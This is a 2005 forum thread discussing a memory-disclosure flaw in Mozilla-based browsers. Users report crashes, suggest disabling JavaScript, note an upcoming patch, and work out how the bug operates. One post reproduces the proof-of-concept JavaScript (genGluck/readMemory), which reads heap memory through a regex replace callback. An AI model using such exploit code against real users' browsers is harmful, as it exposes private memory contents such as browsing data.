Critacal flaw in Mozilla based browsers
Posted: 2005-04-06 02:46am
They dropped the ball bad with this one. Hopefully there'll be an urgent security update soon.
StarDestroyer.Net BBS
Get your fill of sci-fi, science, and mockery of stupid ideas
http://stardestroyer.dyndns-home.com/
Critacal flaw in Mozilla based browsers
http://stardestroyer.dyndns-home.com/viewtopic.php?f=24&t=66074
Page 1 of 1
Posted: 2005-04-06 04:40am
They dropped the ball bad with this one. Hopefully there'll be an urgent security update soon.
Posted: 2005-04-06 06:18am
Windows crashed Mozilla when I tried running the script. Repeatedly. Funny that.
Posted: 2005-04-06 11:01am
Weird. It worked, showing some sites I had just been to. I clicked a couple more times and suddenly Firefox crashed.
Posted: 2005-04-06 12:16pm
Hmmmm.... this isn't good. Luckily I disable external access to my computer when it isn't in use. Still disconcerting though.
Posted: 2005-04-06 12:21pm
All you have to do is disable JAVA scripting, which is pretty easy with Mozilla (I had actually already done it).
Posted: 2005-04-06 12:21pm
Yep. That's what happens when you try to access memory that doesn't belong to you. Seg. fault/core dump.Praxis wrote:Weird. It worked, showing some sites I had just been to. I clicked a couple more times and suddenly Firefox crashed.
This is an appallingly bad security bug.
Posted: 2005-04-06 12:58pm
Crashed my browser too 
Posted: 2005-04-06 01:57pm
Here's the code that does it (except those three Xs should actually be 10 000) :
Now, how the hell does that work? That first regexp up there should replace "end" with nothing, right? And the second regexp replaces all "end" with something before with nothing, so all that basically does is removes that last "end". And that last, mem.replace, should replace most readable characters with a blank space, so why does it write characters from the memory? 
This seems to be almost as weird as the time when IE started hating my if-s (which was very weird, but then again, it was IE...)
Code: Select all
function genGluck(str){
var x = str;
var rx=/end/i;
x = x.replace(rx,function($1){
$1.match(rx);
return "";
});
x = x.replace(/^end/,"");
return x;
}
function readMemory()
{
var mem = genGluck("XXXend");
mem = mem.replace(/[^\.\\\:\/\'\(\)\"\_\?\=\%\&\;\#\@\- a-zA-Z0-9]+/g, " ");
document.getElementById('result').value = mem;
}
This seems to be almost as weird as the time when IE started hating my if-s (which was very weird, but then again, it was IE...)
Posted: 2005-04-06 03:14pm
The last regexp is doing the reverse of what you say: it's keeping only the human-readable characters, and replacing unprintable characters with a space. Note the '^' at the front of the set; it's matching characters in the complement of that set.Dooey Jo wrote: Now, how the hell does that work? That first regexp up there should replace "end" with nothing, right? And the second regexp replaces all "end" with something before with nothing, so all that basically does is removes that last "end". And that last, mem.replace, should replace most readable characters with a blank space, so why does it write characters from the memory?
The bug is exploited in the 'genGluck' function. I'm not familiar with Javascript, but it looks as though by using a lambda function as the argument to 'replace' as they do, they are able to read off the end of their allocated string and into the heap. Probably the memory accessible to them depends on where in the heap their string got allocated.
Until there is a fix available, I would turn off Javascript as much as possible, turning it on only for sites that demand the use of it. I would also quit the browser and relaunch after viewing or entering sensitive information.
Posted: 2005-04-07 09:22am
Javascript can be very useful, too. Most websites would be a lot less functional without it (for most people anyway). It sucks though that there are people out there that use it to do bad stuff, but I guess that's just the way humans are. Someone comes up with a great idea and someone else have to use it do annoy the shit out of others...
Ah yes, right you are! *cleans glasses*Spacebeard wrote:The last regexp is doing the reverse of what you say: it's keeping only the human-readable characters, and replacing unprintable characters with a space. Note the '^' at the front of the set; it's matching characters in the complement of that set.
Yes, that is what I find strange. That function should just replace the match with nothing, it should not make memory accessible. Well, I guess that's why it's a bug...The bug is exploited in the 'genGluck' function. I'm not familiar with Javascript, but it looks as though by using a lambda function as the argument to 'replace' as they do, they are able to read off the end of their allocated string and into the heap. Probably the memory accessible to them depends on where in the heap their string got allocated.
Posted: 2005-04-08 12:42am
That's odd. I have Firefox and clicked that test repeatedly but no crash. 
I guess that's a good thing, though
I guess that's a good thing, though
Posted: 2005-04-08 06:57am
I'm sure some of you already know this, but Mozilla is already working on the patch (ver. 1.0.3) which should be out in a couple days...
See here.
See here.
Posted: 2005-04-08 11:31am
*shrug* I don't have Java installed for my Firefox anyway (at least, I don't think I do). I still use IE for Java work because the webpages I work on recognize my copy of it. I wonder if ZoneAlarm blocks that security hole...
Posted: 2005-04-08 11:44am
Java is not the same as JavaScript.The Dark wrote:*shrug* I don't have Java installed for my Firefox anyway (at least, I don't think I do). I still use IE for Java work because the webpages I work on recognize my copy of it. I wonder if ZoneAlarm blocks that security hole...
Posted: 2005-04-08 11:54am
Doh!Uraniun235 wrote:Java is not the same as JavaScript.The Dark wrote:*shrug* I don't have Java installed for my Firefox anyway (at least, I don't think I do). I still use IE for Java work because the webpages I work on recognize my copy of it. I wonder if ZoneAlarm blocks that security hole...
. I can't read today. That's what comes of reading through multiple things at work, none of them get read completely correct.Posted: 2005-04-08 07:31pm
For example, both Google Maps and Gmail heavily use JavaScript. The technology is generically known as Ajax, or "Asynchronous JavaScript + XML."Dooey Jo wrote:Javascript can be very useful, too. Most websites would be a lot less functional without it (for most people anyway). It sucks though that there are people out there that use it to do bad stuff, but I guess that's just the way humans are. Someone comes up with a great idea and someone else have to use it do annoy the shit out of others...